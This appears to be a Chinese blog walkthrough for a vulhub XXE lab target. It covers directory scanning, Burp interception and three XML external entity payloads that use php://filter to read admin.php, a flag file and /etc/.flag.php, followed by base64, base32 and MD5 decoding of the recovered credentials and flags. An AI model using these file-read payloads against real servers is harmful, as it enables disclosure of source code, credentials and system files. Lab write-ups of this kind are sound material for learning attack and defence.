当前位置: 首页 > article >正文

vulhub xxe靶机

步骤一:搜索靶机地址

步骤二:利用dirsearsh扫描目录

步骤三:进入靶机

进入robots.txt

步骤四:访问/xxe

步骤五:输入用户名密码,利用burp抓包,传送至重放器

输入:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码有用户名密码

密码进行md5解密

步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123

点击Flag

进入新目录

读取目录:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码

得出Flag进行base32解码

得出结果进行base64解码

步骤七:读取目录

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
 

进行base64解码

步骤八:在www目录下添加php文件

访问本机php文件,得出结果


http://www.kler.cn/a/281660.html

相关文章:

  • 安全可靠的国产自研数据库PolarDB V2.0,让数据库开发像“搭积木”一样简单
  • 量化交易策略:期货跨期套利之油粕比金银比策略python代码实现
  • 在Windows上安装MySQL的步骤
  • Linux查看jvm相关参数以及设置调优参数
  • 终极解决 docker 拉取镜像失败的问题,其他类似场景也适用
  • 动物消消乐:Scratch消除类游戏作品
  • C语言迷宫制造
  • python-FastApi框架
  • 文件上传面板中限制需要的文件格式,并且隐藏“所有文件”选项
  • Linux 系统性能调优 1
  • QT C++ 判断字符串是否是一个数字
  • Pandas库性能优化指南:从基础到进阶(终)
  • 10、Flink 动态表之查询限制详解
  • XXE-labs靶场通关攻略
  • Github 2024-08-23 Java开源项目日报 Top9
  • 数学建模学习(121):Python实现模糊AHP(Fuzzy AHP)——从原理到实践
  • Word中设置奇数页的页眉为一级标题内容;偶数页的页眉为文章题目
  • Android - 音频参数合入
  • 【kubernetes】kubernetes Deployment 详解
  • 【ElasticSearch】基本命令